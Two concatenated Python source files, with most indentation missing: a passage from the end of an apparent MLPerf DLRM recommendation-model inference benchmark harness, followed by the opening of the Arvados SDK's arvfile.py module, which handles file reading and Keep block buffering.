ln_emb=np.array([1460,583,10131227,2202608,305,24,12517,633,3,93145,5683,8351593,3194,27,14992,5461306,10,5652,2173,4,7046547,18,15,286181,105,142572]),
ln_bot=np.array([13,512,256,64,16]),
ln_top=np.array([367,512,256,1]),
use_gpu=use_gpu
)
elif dataset == "terabyte":
if max_ind_range == 10000000:
# 2. Criteo Terabyte (see ./bench/dlrm_s_criteo_terabyte.sh [--sub-sample=0.875] --max-in-range=10000000)
backend = BackendPytorchNative(
m_spa=64,
ln_emb=np.array([9980333,36084,17217,7378,20134,3,7112,1442,61, 9758201,1333352,313829,10,2208,11156,122,4,970,14, 9994222, 7267859, 9946608,415421,12420,101, 36]),
ln_bot=np.array([13,512,256,64]),
ln_top=np.array([415,512,512,256,1]),
use_gpu=use_gpu
)
elif max_ind_range == 40000000:
# 3. Criteo Terabyte MLPerf training (see ./bench/run_and_time.sh --max-in-range=40000000)
backend = BackendPytorchNative(
m_spa=128,
ln_emb=np.array([39884406,39043,17289,7420,20263,3,7120,1543,63,38532951,2953546,403346,10,2208,11938,155,4,976,14,39979771,25641295,39664984,585935,12972,108,36]),
ln_bot=np.array([13,512,256,128]),
ln_top=np.array([479,1024,1024,512,256,1]),
use_gpu=use_gpu
)
else:
raise ValueError("only --max-in-range 10M or 40M is supported")
else:
raise ValueError("only kaggle|terabyte dataset options are supported")
elif backend == "onnxruntime":
from backend_onnxruntime import BackendOnnxruntime
# NOTE: pass model parameters here, the following options are available
if dataset == "kaggle":
# 1. Criteo Kaggle Display Advertisement Challenge Dataset (see ./bench/dlrm_s_criteo_kaggle.sh)
backend = BackendOnnxruntime(
m_spa=16,
ln_emb=np.array([1460,583,10131227,2202608,305,24,12517,633,3,93145,5683,8351593,3194,27,14992,5461306,10,5652,2173,4,7046547,18,15,286181,105,142572]),
ln_bot=np.array([13,512,256,64,16]),
ln_top=np.array([367,512,256,1]),
use_gpu=use_gpu
)
elif dataset == "terabyte":
if max_ind_range == 10000000:
# 2. Criteo Terabyte (see ./bench/dlrm_s_criteo_terabyte.sh [--sub-sample=0.875] --max-in-range=10000000)
backend = BackendOnnxruntime(
m_spa=64,
ln_emb=np.array([9980333,36084,17217,7378,20134,3,7112,1442,61, 9758201,1333352,313829,10,2208,11156,122,4,970,14, 9994222, 7267859, 9946608,415421,12420,101, 36]),
ln_bot=np.array([13,512,256,64]),
ln_top=np.array([415,512,512,256,1]),
use_gpu=use_gpu
)
elif max_ind_range == 40000000:
# 3. Criteo Terabyte MLPerf training (see ./bench/run_and_time.sh --max-in-range=40000000)
backend = BackendOnnxruntime(
m_spa=128,
ln_emb=np.array([39884406,39043,17289,7420,20263,3,7120,1543,63,38532951,2953546,403346,10,2208,11938,155,4,976,14,39979771,25641295,39664984,585935,12972,108,36]),
ln_bot=np.array([13,512,256,128]),
ln_top=np.array([479,1024,1024,512,256,1]),
use_gpu=use_gpu
)
else:
raise ValueError("only --max-in-range 10M or 40M is supported")
else:
raise ValueError("only kaggle|terabyte dataset options are supported")
else:
raise ValueError("unknown backend: " + backend)
return backend
class Item:
"""An item that we queue for processing by the thread pool."""
def __init__(self, query_id, content_id, batch_dense_X, batch_lS_o, batch_lS_i, batch_T=None, idx_offsets=None):
self.query_id = query_id
self.content_id = content_id
self.batch_dense_X = batch_dense_X
self.batch_lS_o = batch_lS_o
self.batch_lS_i = batch_lS_i
self.batch_T = batch_T
self.idx_offsets = idx_offsets
self.start = time.time()
class RunnerBase:
def __init__(self, model, ds, threads, post_proc=None, max_batchsize=128):
self.take_accuracy = False
self.ds = ds
self.model = model
self.post_process = post_proc
self.threads = threads
self.max_batchsize = max_batchsize
self.result_timing = []
def handle_tasks(self, tasks_queue):
pass
def start_run(self, result_dict, take_accuracy):
self.result_dict = result_dict
self.result_timing = []
self.take_accuracy = take_accuracy
self.post_process.start()
def run_one_item(self, qitem):
# run the prediction
processed_results = []
try:
results = self.model.predict(qitem.batch_dense_X, qitem.batch_lS_o, qitem.batch_lS_i)
processed_results = self.post_process(results, qitem.batch_T, self.result_dict)
if self.take_accuracy:
self.post_process.add_results(processed_results)
self.result_timing.append(time.time() - qitem.start)
except Exception as ex: # pylint: disable=broad-except
log.error("thread: failed, %s", ex)
# since post_process will not run, fake empty responses
processed_results = [[]] * len(qitem.query_id)
finally:
response_array_refs = []
response = []
for idx, query_id in enumerate(qitem.query_id):
# NOTE: processed_results returned by DlrmPostProcess store both
# result = processed_results[idx][0] and target = processed_results[idx][1]
# also each idx might be a query of samples, rather than a single sample
# depending on the --samples-to-aggregate* arguments.
s_idx = qitem.idx_offsets[idx]
e_idx = qitem.idx_offsets[idx + 1]
# debug prints
# print("s,e:",s_idx,e_idx, len(processed_results))
response_array = array.array("B", np.array(processed_results[s_idx:e_idx], np.float32).tobytes())
response_array_refs.append(response_array)
bi = response_array.buffer_info()
response.append(lg.QuerySampleResponse(query_id, bi[0], bi[1]))
lg.QuerySamplesComplete(response)
def enqueue(self, query_samples):
idx = [q.index for q in query_samples]
query_id = [q.id for q in query_samples]
query_len = len(query_samples)
if query_len < self.max_batchsize:
batch_dense_X, batch_lS_o, batch_lS_i, batch_T, idx_offsets = self.ds.get_samples(idx)
self.run_one_item(Item(query_id, idx, batch_dense_X, batch_lS_o, batch_lS_i, batch_T, idx_offsets))
else:
bs = self.max_batchsize
for i in range(0, query_len, bs):
ie = min(i + bs, query_len)
batch_dense_X, batch_lS_o, batch_lS_i, batch_T, idx_offsets = self.ds.get_samples(idx[i:ie])
self.run_one_item(Item(query_id[i:ie], idx[i:ie], batch_dense_X, batch_lS_o, batch_lS_i, batch_T, idx_offsets))
def finish(self):
pass
class QueueRunner(RunnerBase):
def __init__(self, model, ds, threads, post_proc=None, max_batchsize=128):
super().__init__(model, ds, threads, post_proc, max_batchsize)
queue_size_multiplier = 4 #(args.samples_per_query_offline + max_batchsize - 1) // max_batchsize)
self.tasks = Queue(maxsize=threads * queue_size_multiplier)
self.workers = []
self.result_dict = {}
for _ in range(self.threads):
worker = threading.Thread(target=self.handle_tasks, args=(self.tasks,))
worker.daemon = True
self.workers.append(worker)
worker.start()
def handle_tasks(self, tasks_queue):
"""Worker thread."""
while True:
qitem = tasks_queue.get()
if qitem is None:
                # None in the queue indicates the parent wants us to exit
tasks_queue.task_done()
break
self.run_one_item(qitem)
tasks_queue.task_done()
def enqueue(self, query_samples):
idx = [q.index for q in query_samples]
query_id = [q.id for q in query_samples]
query_len = len(query_samples)
if query_len < self.max_batchsize:
batch_dense_X, batch_lS_o, batch_lS_i, batch_T, idx_offsets = self.ds.get_samples(idx)
self.tasks.put(Item(query_id, idx, batch_dense_X, batch_lS_o, batch_lS_i, batch_T, idx_offsets))
else:
bs = self.max_batchsize
for i in range(0, query_len, bs):
ie = min(i + bs, query_len)
batch_dense_X, batch_lS_o, batch_lS_i, batch_T, idx_offsets = self.ds.get_samples(idx[i:ie])
self.tasks.put(Item(query_id[i:ie], idx[i:ie], batch_dense_X, batch_lS_o, batch_lS_i, batch_T, idx_offsets))
def finish(self):
# exit all threads
for _ in self.workers:
self.tasks.put(None)
for worker in self.workers:
worker.join()
def add_results(final_results, name, result_dict, result_list, took, show_accuracy=False):
percentiles = [50., 80., 90., 95., 99., 99.9]
buckets = np.percentile(result_list, percentiles).tolist()
buckets_str = ",".join(["{}:{:.4f}".format(p, b) for p, b in zip(percentiles, buckets)])
if result_dict["total"] == 0:
result_dict["total"] = len(result_list)
# this is what we record for each run
result = {
"took": took,
"mean": np.mean(result_list),
"percentiles": {str(k): v for k, v in zip(percentiles, buckets)},
"qps": len(result_list) / took,
"count": len(result_list),
"good_items": result_dict["good"],
"total_items": result_dict["total"],
}
acc_str = ""
if show_accuracy:
result["accuracy"] = 100. * result_dict["good"] / result_dict["total"]
acc_str = ", acc={:.3f}%".format(result["accuracy"])
if "roc_auc" in result_dict:
result["roc_auc"] = 100. * result_dict["roc_auc"]
acc_str += ", auc={:.3f}%".format(result["roc_auc"])
# add the result to the result dict
final_results[name] = result
# to stdout
print("{} qps={:.2f}, mean={:.4f}, time={:.3f}{}, queries={}, tiles={}".format(
name, result["qps"], result["mean"], took, acc_str,
len(result_list), buckets_str))
def main():
global last_timeing
args = get_args()
log.info(args)
# find backend
backend = get_backend(args.backend, args.dataset, args.max_ind_range, args.data_sub_sample_rate, args.use_gpu)
# dataset to use
wanted_dataset, pre_proc, post_proc, kwargs = SUPPORTED_DATASETS[args.dataset]
# --count-samples can be used to limit the number of samples used for testing
ds = wanted_dataset(data_path=args.dataset_path,
name=args.dataset,
pre_process=pre_proc, # currently an identity function
use_cache=args.cache, # currently not used
count=args.count_samples,
samples_to_aggregate_fix=args.samples_to_aggregate_fix,
samples_to_aggregate_min=args.samples_to_aggregate_min,
samples_to_aggregate_max=args.samples_to_aggregate_max,
samples_to_aggregate_quantile_file=args.samples_to_aggregate_quantile_file,
samples_to_aggregate_trace_file=args.samples_to_aggregate_trace_file,
test_num_workers=args.test_num_workers,
max_ind_range=args.max_ind_range,
sub_sample_rate=args.data_sub_sample_rate,
mlperf_bin_loader=args.mlperf_bin_loader,
**kwargs)
# load model to backend
model = backend.load(args.model_path, inputs=args.inputs, outputs=args.outputs)
final_results = {
"runtime": model.name(),
"version": model.version(),
"time": int(time.time()),
"cmdline": str(args),
}
mlperf_conf = os.path.abspath(args.mlperf_conf)
if not os.path.exists(mlperf_conf):
log.error("{} not found".format(mlperf_conf))
sys.exit(1)
user_conf = os.path.abspath(args.user_conf)
if not os.path.exists(user_conf):
log.error("{} not found".format(user_conf))
sys.exit(1)
if args.output:
output_dir = os.path.abspath(args.output)
os.makedirs(output_dir, exist_ok=True)
os.chdir(output_dir)
#
# make one pass over the dataset to validate accuracy
#
count = ds.get_item_count()
# warmup
ds.load_query_samples([0])
for _ in range(5):
batch_dense_X, batch_lS_o, batch_lS_i, _, _ = ds.get_samples([0])
_ = backend.predict(batch_dense_X, batch_lS_o, batch_lS_i)
ds.unload_query_samples(None)
scenario = SCENARIO_MAP[args.scenario]
runner_map = {
lg.TestScenario.SingleStream: RunnerBase,
lg.TestScenario.MultiStream: QueueRunner,
lg.TestScenario.Server: QueueRunner,
lg.TestScenario.Offline: QueueRunner
}
runner = runner_map[scenario](model, ds, args.threads, post_proc=post_proc, max_batchsize=args.max_batchsize)
def issue_queries(query_samples):
runner.enqueue(query_samples)
def flush_queries():
pass
def process_latencies(latencies_ns):
# called by loadgen to show us the recorded latencies
global last_timeing
last_timeing = [t / NANO_SEC for t in latencies_ns]
settings = lg.TestSettings()
    settings.FromConfig(mlperf_conf, args.model, args.scenario)
    settings.FromConfig(user_conf, args.model, args.scenario)
settings.scenario = scenario
settings.mode = lg.TestMode.PerformanceOnly
if args.accuracy:
settings.mode = lg.TestMode.AccuracyOnly
if args.find_peak_performance:
settings.mode = lg.TestMode.FindPeakPerformance
if args.duration:
settings.min_duration_ms = args.duration
settings.max_duration_ms = args.duration
if args.target_qps:
settings.server_target_qps = float(args.target_qps)
settings.offline_expected_qps = float(args.target_qps)
if args.count_queries:
settings.min_query_count = args.count_queries
settings.max_query_count = args.count_queries
if args.samples_per_query_multistream:
settings.multi_stream_samples_per_query = args.samples_per_query_multistream
if args.max_latency:
settings.server_target_latency_ns = int(args.max_latency * NANO_SEC)
settings.multi_stream_target_latency_ns = int(args.max_latency * NANO_SEC)
sut = lg.ConstructSUT(issue_queries, flush_queries, process_latencies)
qsl = lg.ConstructQSL(count, min(count, args.samples_per_query_offline), ds.load_query_samples, ds.unload_query_samples)
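    # The QSL's performance sample count is capped by --samples-per-query-offline, which is
    # treated as the perf_sample_count (see the comment at the argument definition above).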
log.info("starting {}".format(scenario))
result_dict = {"good": 0, "total": 0, "roc_auc": 0, "scenario": str(scenario)}
runner.start_run(result_dict, args.accuracy)
lg.StartTest(sut, qsl, settings)
if not last_timeing:
last_timeing = runner.result_timing
if args.accuracy:
post_proc.finalize(result_dict, ds, output_dir=args.output)
add_results(final_results, "{}".format(scenario),
result_dict, last_timeing, time.time() - ds.last_loaded, args.accuracy)
runner.finish()
lg.DestroyQSL(qsl)
lg.DestroySUT(sut)
#
# write final results
#
if args.output:
with open("results.json", "w") as f:
json.dump(final_results, f, sort_keys=True, indent=4)
if __name__ == "__main__":
main()
|
arvfile.py
|
# Copyright (C) The Arvados Authors. All rights reserved.
#
# SPDX-License-Identifier: Apache-2.0
from __future__ import absolute_import
from __future__ import division
from future import standard_library
from future.utils import listitems, listvalues
standard_library.install_aliases()
from builtins import range
from builtins import object
import bz2
import collections
import copy
import errno
import functools
import hashlib
import logging
import os
import queue
import re
import sys
import threading
import uuid
import zlib
from . import config
from .errors import KeepWriteError, AssertionError, ArgumentError
from .keep import KeepLocator
from ._normalize_stream import normalize_stream
from ._ranges import locators_and_ranges, replace_range, Range, LocatorAndRange
from .retry import retry_method
MOD = "mod"
WRITE = "write"
_logger = logging.getLogger('arvados.arvfile')
def split(path):
"""split(path) -> streamname, filename
Separate the stream name and file name in a /-separated stream path and
return a tuple (stream_name, file_name). If no stream name is available,
assume '.'.
"""
try:
stream_name, file_name = path.rsplit('/', 1)
except ValueError: # No / in string
stream_name, file_name = '.', path
return stream_name, file_name
class UnownedBlockError(Exception):
"""Raised when there's an writable block without an owner on the BlockManager."""
pass
class _FileLikeObjectBase(object):
def __init__(self, name, mode):
self.name = name
self.mode = mode
self.closed = False
@staticmethod
def _before_close(orig_func):
@functools.wraps(orig_func)
def before_close_wrapper(self, *args, **kwargs):
if self.closed:
raise ValueError("I/O operation on closed stream file")
return orig_func(self, *args, **kwargs)
return before_close_wrapper
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, traceback):
try:
self.close()
except Exception:
if exc_type is None:
raise
def close(self):
self.closed = True
class ArvadosFileReaderBase(_FileLikeObjectBase):
def __init__(self, name, mode, num_retries=None):
super(ArvadosFileReaderBase, self).__init__(name, mode)
self._filepos = 0
self.num_retries = num_retries
self._readline_cache = (None, None)
def __iter__(self):
while True:
data = self.readline()
if not data:
break
yield data
def decompressed_name(self):
        return re.sub(r'\.(bz2|gz)$', '', self.name)
@_FileLikeObjectBase._before_close
def seek(self, pos, whence=os.SEEK_SET):
if whence == os.SEEK_CUR:
pos += self._filepos
elif whence == os.SEEK_END:
pos += self.size()
if pos < 0:
raise IOError(errno.EINVAL, "Tried to seek to negative file offset.")
self._filepos = pos
return self._filepos
def tell(self):
return self._filepos
def readable(self):
return True
def writable(self):
return False
def seekable(self):
return True
@_FileLikeObjectBase._before_close
@retry_method
def readall(self, size=2**20, num_retries=None):
while True:
data = self.read(size, num_retries=num_retries)
if len(data) == 0:
break
yield data
@_FileLikeObjectBase._before_close
@retry_method
def readline(self, size=float('inf'), num_retries=None):
cache_pos, cache_data = self._readline_cache
if self.tell() == cache_pos:
data = [cache_data]
self._filepos += len(cache_data)
else:
data = [b'']
data_size = len(data[-1])
while (data_size < size) and (b'\n' not in data[-1]):
next_read = self.read(2 ** 20, num_retries=num_retries)
if not next_read:
break
data.append(next_read)
data_size += len(next_read)
data = b''.join(data)
try:
nextline_index = data.index(b'\n') + 1
except ValueError:
nextline_index = len(data)
nextline_index = min(nextline_index, size)
self._filepos -= len(data) - nextline_index
self._readline_cache = (self.tell(), data[nextline_index:])
return data[:nextline_index].decode()
@_FileLikeObjectBase._before_close
@retry_method
def decompress(self, decompress, size, num_retries=None):
for segment in self.readall(size, num_retries=num_retries):
data = decompress(segment)
if data:
yield data
@_FileLikeObjectBase._before_close
@retry_method
def readall_decompressed(self, size=2**20, num_retries=None):
self.seek(0)
if self.name.endswith('.bz2'):
dc = bz2.BZ2Decompressor()
return self.decompress(dc.decompress, size,
num_retries=num_retries)
elif self.name.endswith('.gz'):
dc = zlib.decompressobj(16+zlib.MAX_WBITS)
return self.decompress(lambda segment: dc.decompress(dc.unconsumed_tail + segment),
size, num_retries=num_retries)
else:
return self.readall(size, num_retries=num_retries)
@_FileLikeObjectBase._before_close
@retry_method
def readlines(self, sizehint=float('inf'), num_retries=None):
data = []
data_size = 0
for s in self.readall(num_retries=num_retries):
data.append(s)
data_size += len(s)
if data_size >= sizehint:
break
return b''.join(data).decode().splitlines(True)
def size(self):
raise IOError(errno.ENOSYS, "Not implemented")
def read(self, size, num_retries=None):
raise IOError(errno.ENOSYS, "Not implemented")
def readfrom(self, start, size, num_retries=None):
raise IOError(errno.ENOSYS, "Not implemented")
class StreamFileReader(ArvadosFileReaderBase):
class _NameAttribute(str):
# The Python file API provides a plain .name attribute.
# Older SDK provided a name() method.
# This class provides both, for maximum compatibility.
def __call__(self):
return self
def __init__(self, stream, segments, name):
super(StreamFileReader, self).__init__(self._NameAttribute(name), 'rb', num_retries=stream.num_retries)
self._stream = stream
self.segments = segments
def stream_name(self):
return self._stream.name()
def size(self):
n = self.segments[-1]
return n.range_start + n.range_size
@_FileLikeObjectBase._before_close
@retry_method
def read(self, size, num_retries=None):
"""Read up to 'size' bytes from the stream, starting at the current file position"""
if size == 0:
return b''
data = b''
available_chunks = locators_and_ranges(self.segments, self._filepos, size)
if available_chunks:
lr = available_chunks[0]
data = self._stream.readfrom(lr.locator+lr.segment_offset,
lr.segment_size,
num_retries=num_retries)
self._filepos += len(data)
return data
@_FileLikeObjectBase._before_close
@retry_method
def readfrom(self, start, size, num_retries=None):
"""Read up to 'size' bytes from the stream, starting at 'start'"""
if size == 0:
return b''
data = []
for lr in locators_and_ranges(self.segments, start, size):
data.append(self._stream.readfrom(lr.locator+lr.segment_offset, lr.segment_size,
num_retries=num_retries))
return b''.join(data)
def as_manifest(self):
segs = []
for r in self.segments:
segs.extend(self._stream.locators_and_ranges(r.locator, r.range_size))
return " ".join(normalize_stream(".", {self.name: segs})) + "\n"
def synchronized(orig_func):
@functools.wraps(orig_func)
def synchronized_wrapper(self, *args, **kwargs):
with self.lock:
return orig_func(self, *args, **kwargs)
return synchronized_wrapper
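# Note: synchronized() assumes the decorated method's instance exposes a `self.lock` that works
# as a context manager (e.g. threading.Lock, or NoopLock below).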
class StateChangeError(Exception):
def __init__(self, message, state, nextstate):
super(StateChangeError, self).__init__(message)
self.state = state
self.nextstate = nextstate
class _BufferBlock(object):
"""A stand-in for a Keep block that is in the process of being written.
Writers can append to it, get the size, and compute the Keep locator.
There are three valid states:
WRITABLE
Can append to block.
PENDING
Block is in the process of being uploaded to Keep, append is an error.
COMMITTED
The block has been written to Keep, its internal buffer has been
released, fetching the block will fetch it via keep client (since we
discarded the internal copy), and identifiers referring to the BufferBlock
can be replaced with the block locator.
"""
WRITABLE = 0
PENDING = 1
COMMITTED = 2
ERROR = 3
DELETED = 4
def __init__(self, blockid, starting_capacity, owner):
"""
:blockid:
the identifier for this block
:starting_capacity:
the initial buffer capacity
:owner:
ArvadosFile that owns this block
"""
self.blockid = blockid
self.buffer_block = bytearray(starting_capacity)
self.buffer_view = memoryview(self.buffer_block)
self.write_pointer = 0
self._state = _BufferBlock.WRITABLE
self._locator = None
self.owner = owner
self.lock = threading.Lock()
self.wait_for_commit = threading.Event()
self.error = None
@synchronized
def append(self, data):
"""Append some data to the buffer.
Only valid if the block is in WRITABLE state. Implements an expanding
        buffer, doubling capacity as needed to accommodate all the data.
"""
if self._state == _BufferBlock.WRITABLE:
if not isinstance(data, bytes) and not isinstance(data, memoryview):
data = data.encode()
while (self.write_pointer+len(data)) > len(self.buffer_block):
new_buffer_block = bytearray(len(self.buffer_block) * 2)
new_buffer_block[0:self.write_pointer] = self.buffer_block[0:self.write_pointer]
self.buffer_block = new_buffer_block
self.buffer_view = memoryview(self.buffer_block)
self.buffer_view[self.write_pointer:self.write_pointer+len(data)] = data
self.write_pointer += len(data)
self._locator = None
else:
raise AssertionError("Buffer block is not writable")
STATE_TRANSITIONS = frozenset([
(WRITABLE, PENDING),
(PENDING, COMMITTED),
(PENDING, ERROR),
(ERROR, PENDING)])
@synchronized
def set_state(self, nextstate, val=None):
if (self._state, nextstate) not in self.STATE_TRANSITIONS:
raise StateChangeError("Invalid state change from %s to %s" % (self._state, nextstate), self._state, nextstate)
self._state = nextstate
if self._state == _BufferBlock.PENDING:
self.wait_for_commit.clear()
if self._state == _BufferBlock.COMMITTED:
self._locator = val
self.buffer_view = None
self.buffer_block = None
self.wait_for_commit.set()
if self._state == _BufferBlock.ERROR:
self.error = val
self.wait_for_commit.set()
@synchronized
def state(self):
return self._state
def size(self):
"""The amount of data written to the buffer."""
return self.write_pointer
@synchronized
def locator(self):
"""The Keep locator for this buffer's contents."""
if self._locator is None:
self._locator = "%s+%i" % (hashlib.md5(self.buffer_view[0:self.write_pointer]).hexdigest(), self.size())
return self._locator
@synchronized
def clone(self, new_blockid, owner):
if self._state == _BufferBlock.COMMITTED:
raise AssertionError("Cannot duplicate committed buffer block")
bufferblock = _BufferBlock(new_blockid, self.size(), owner)
bufferblock.append(self.buffer_view[0:self.size()])
return bufferblock
@synchronized
def clear(self):
self._state = _BufferBlock.DELETED
self.owner = None
self.buffer_block = None
self.buffer_view = None
@synchronized
def repack_writes(self):
"""Optimize buffer block by repacking segments in file sequence.
When the client makes random writes, they appear in the buffer block in
the sequence they were written rather than the sequence they appear in
the file. This makes for inefficient, fragmented manifests. Attempt
to optimize by repacking writes in file sequence.
"""
if self._state != _BufferBlock.WRITABLE:
raise AssertionError("Cannot repack non-writable block")
segs = self.owner.segments()
# Collect the segments that reference the buffer block.
bufferblock_segs = [s for s in segs if s.locator == self.blockid]
# Collect total data referenced by segments (could be smaller than
# bufferblock size if a portion of the file was written and
# then overwritten).
write_total = sum([s.range_size for s in bufferblock_segs])
if write_total < self.size() or len(bufferblock_segs) > 1:
# If there's more than one segment referencing this block, it is
# due to out-of-order writes and will produce a fragmented
# manifest, so try to optimize by re-packing into a new buffer.
contents = self.buffer_view[0:self.write_pointer].tobytes()
new_bb = _BufferBlock(None, write_total, None)
for t in bufferblock_segs:
new_bb.append(contents[t.segment_offset:t.segment_offset+t.range_size])
t.segment_offset = new_bb.size() - t.range_size
self.buffer_block = new_bb.buffer_block
self.buffer_view = new_bb.buffer_view
self.write_pointer = new_bb.write_pointer
self._locator = None
new_bb.clear()
self.owner.set_segments(segs)
def __repr__(self):
return "<BufferBlock %s>" % (self.blockid)
class NoopLock(object):
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, traceback):
pass
def acquire(self, blocking=False):
pass
def release(self):
pass
def must_be_writable(orig_func):
@functools.wraps(orig_func)
def must_be_writable_wrapper(self, *args, **kwargs):
if not self.writable():
raise IOError(errno.EROFS, "Collection is read-only.")
return orig_func(self, *args, **kwargs)
return must_be_writable_wrapper
class _BlockManager(object):
"""BlockManager handles buffer blocks.
Also handles background block uploads, and background block prefetch for a
Collection of ArvadosFiles.
"""
DEFAULT_PUT_THREADS = 2
DEFAULT_GET_THREADS = 2
def __init__(self, keep, copies=None, put_threads=None, num_retries=None):
"""keep: KeepClient object to use"""
self._keep = keep
self._bufferblocks = collections.OrderedDict()
self._put_queue = None
self._put_threads = None
self._prefetch_queue = None
self._prefetch_threads = None
self.lock = threading.Lock()
self.prefetch_enabled = True
if put_threads:
self.num_put_threads = put_threads
else:
self.num_put_threads = _BlockManager.DEFAULT_PUT_THREADS
self.num_get_threads = _BlockManager.DEFAULT_GET_THREADS
self.copies = copies
self._pending_write_size = 0
self.threads_lock = threading.Lock()
self.padding_block = None
self.num_retries = num_retries
@synchronized
def alloc_bufferblock(self, blockid=None, starting_capacity=2**14, owner=None):
"""Allocate a new, empty bufferblock in WRITABLE state and return it.
:blockid:
optional block identifier, otherwise one will be automatically assigned
:starting_capacity:
optional capacity, otherwise will use default capacity
:owner:
ArvadosFile that owns this block
"""
return self._alloc_bufferblock(blockid, starting_capacity, owner)
def _alloc_bufferblock(self, blockid=None, starting_capacity=2**14, owner=None):
if blockid is None:
blockid = str(uuid.uuid4())
bufferblock = _BufferBlock(blockid, starting_capacity=starting_capacity, owner=owner)
self._bufferblocks[bufferblock.blockid] = bufferblock
return bufferblock
@synchronized
def dup_block(self, block, owner):
"""Create a new bufferblock initialized with the content of an existing bufferblock.
:block:
the buffer block to copy.
:owner:
ArvadosFile that owns the new block
"""
new_blockid = str(uuid.uuid4())
bufferblock = block.clone(new_blockid, owner)
self._bufferblocks[bufferblock.blockid] = bufferblock
return bufferblock
@synchronized
def is_bufferblock(self, locator):
return locator in self._bufferblocks
def _commit_bufferblock_worker(self):
"""Background uploader thread."""
while True:
try:
bufferblock = self._put_queue.get()
if bufferblock is None:
return
if self.copies is None:
loc = self._keep.put(bufferblock.buffer_view[0:bufferblock.write_pointer].tobytes(), num_retries=self.num_retries)
else:
loc = self._keep.put(bufferblock.buffer_view[0:bufferblock.write_pointer].tobytes(), num_retries=self.num_retries, copies=self.copies)
bufferblock.set_state(_BufferBlock.COMMITTED, loc)
except Exception as e:
bufferblock.set_state(_BufferBlock.ERROR, e)
finally:
if self._put_queue is not None:
self._put_queue.task_done()
def start_put_threads(self):
with self.threads_lock:
if self._put_threads is None:
# Start uploader threads.
# If we don't limit the Queue size, the upload queue can quickly
# grow to take up gigabytes of RAM if the writing process is
# generating data more quickly than it can be sent to the Keep
# servers.
#
# With two upload threads and a queue size of 2, this means up to 4
# blocks pending. If they are full 64 MiB blocks, that means up to
# 256 MiB of internal buffering, which is the same size as the
# default download block cache in KeepClient.
self._put_queue = queue.Queue(maxsize=2)
self._put_threads = []
for i in range(0, self.num_put_threads):
thread = threading.Thread(target=self._commit_bufferblock_worker)
self._put_threads.append(thread)
thread.daemon = True
thread.start()
def _block_prefetch_worker(self):
"""The background downloader thread."""
while True:
try:
b = self._prefetch_queue.get()
if b is None:
return
self._keep.get(b)
except Exception:
_logger.exception("Exception doing block prefetch")
@synchronized
def start_get_threads(self):
if self._prefetch_threads is None:
self._prefetch_queue = queue.Queue()
self._prefetch_threads = []
for i in range(0, self.num_get_threads):
thread = threading.Thread(target=self._block_prefetch_worker)
self._prefetch_threads.append(thread)
thread.daemon = True
thread.start()
@synchronized
def stop_threads(self):
"""Shut down and wait for background upload and download threads to finish."""
if self._put_threads is not None:
for t in self._put_threads:
self._put_queue.put(None)
for t in self._put_threads:
t.join()
self._put_threads = None
self._put_queue = None
if self._prefetch_threads is not None:
for t in self._prefetch_threads:
self._prefetch_queue.put(None)
for t in self._prefetch_threads:
t.join()
self._prefetch_threads = None
self._prefetch_queue = None
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, traceback):
self.stop_threads()
@synchronized
def repack_small_blocks(self, force=False, sync=False, closed_file_size=0):
"""Packs small blocks together before uploading"""
self._pending_write_size += closed_file_size
# Check if there is enough pending small-block data to fill one full block
if not (force or (self._pending_write_size >= config.KEEP_BLOCK_SIZE)):
return
# Look for blocks that are ready to be packed together before being
# committed to Keep.
# A WRITABLE block always has an owner.
# A WRITABLE block with its owner.closed() implies that its
# size is <= KEEP_BLOCK_SIZE/2.
try:
small_blocks = [b for b in listvalues(self._bufferblocks)
if b.state() == _BufferBlock.WRITABLE and b.owner.closed()]
except AttributeError:
# Writable blocks without owner shouldn't exist.
raise UnownedBlockError()
if len(small_blocks) <= 1:
# Not enough small blocks for repacking
return
for bb in small_blocks:
bb.repack_writes()
# Update the pending write size count with its true value, just in case
# some small file was opened, written and closed several times.
self._pending_write_size = sum([b.size() for b in small_blocks])
if self._pending_write_size < config.KEEP_BLOCK_SIZE and not force:
return
new_bb = self._alloc_bufferblock()
new_bb.owner = []
files = []
while len(small_blocks) > 0 and (new_bb.write_pointer + small_blocks[0].size()) <= config.KEEP_BLOCK_SIZE:
bb = small_blocks.pop(0)
new_bb.owner.append(bb.owner)
self._pending_write_size -= bb.size()
new_bb.append(bb.buffer_view[0:bb.write_pointer].tobytes())
files.append((bb, new_bb.write_pointer - bb.size()))
self.commit_bufferblock(new_bb, sync=sync)
for bb, new_bb_segment_offset in files:
newsegs = bb.owner.segments()
for s in newsegs:
if s.locator == bb.blockid:
s.locator = new_bb.blockid
s.segment_offset = new_bb_segment_offset+s.segment_offset
bb.owner.set_segments(newsegs)
self._delete_bufferblock(bb.blockid)
def commit_bufferblock(self, block, sync):
"""Initiate a background upload of a bufferblock.
:block:
The block object to upload
:sync:
If `sync` is True, upload the block synchronously.
If `sync` is False, upload the block asynchronously. This will
return immediately unless the upload queue is at capacity, in
which case it will wait on an upload queue slot.
"""
try:
# Mark the block as PENDING so as to disallow any more appends.
block.set_state(_BufferBlock.PENDING)
except StateChangeError as e:
if e.state == _BufferBlock.PENDING:
if sync:
block.wait_for_commit.wait()
else:
return
if block.state() == _BufferBlock.COMMITTED:
return
elif block.state() == _BufferBlock.ERROR:
raise block.error
else:
raise
if sync:
try:
if self.copies is None:
loc = self._keep.put(block.buffer_view[0:block.write_pointer].tobytes(), num_retries=self.num_retries)
else:
loc = self._keep.put(block.buffer_view[0:block.write_pointer].tobytes(), num_retries=self.num_retries, copies=self.copies)
block.set_state(_BufferBlock.COMMITTED, loc)
except Exception as e:
block.set_state(_BufferBlock.ERROR, e)
raise
else:
self.start_put_threads()
self._put_queue.put(block)
@synchronized
def get_bufferblock(self, locator):
return self._bufferblocks.get(locator)
@synchronized
def get_padding_block(self):
"""Get a bufferblock 64 MB in size consisting of all zeros, used as padding
when using truncate() to extend the size of a file.
For reference (and possible future optimization), the md5sum of the
padding block is: 7f614da9329cd3aebf59b91aadc30bf0+67108864
"""
if self.padding_block is None:
self.padding_block = self._alloc_bufferblock(starting_capacity=config.KEEP_BLOCK_SIZE)
self.padding_block.write_pointer = config.KEEP_BLOCK_SIZE
self.commit_bufferblock(self.padding_block, False)
return self.padding_block
@synchronized
def delete_bufferblock(self, locator):
self._delete_bufferblock(locator)
def _delete_bufferblock(self, locator):
bb = self._bufferblocks[locator]
bb.clear()
del self._bufferblocks[locator]
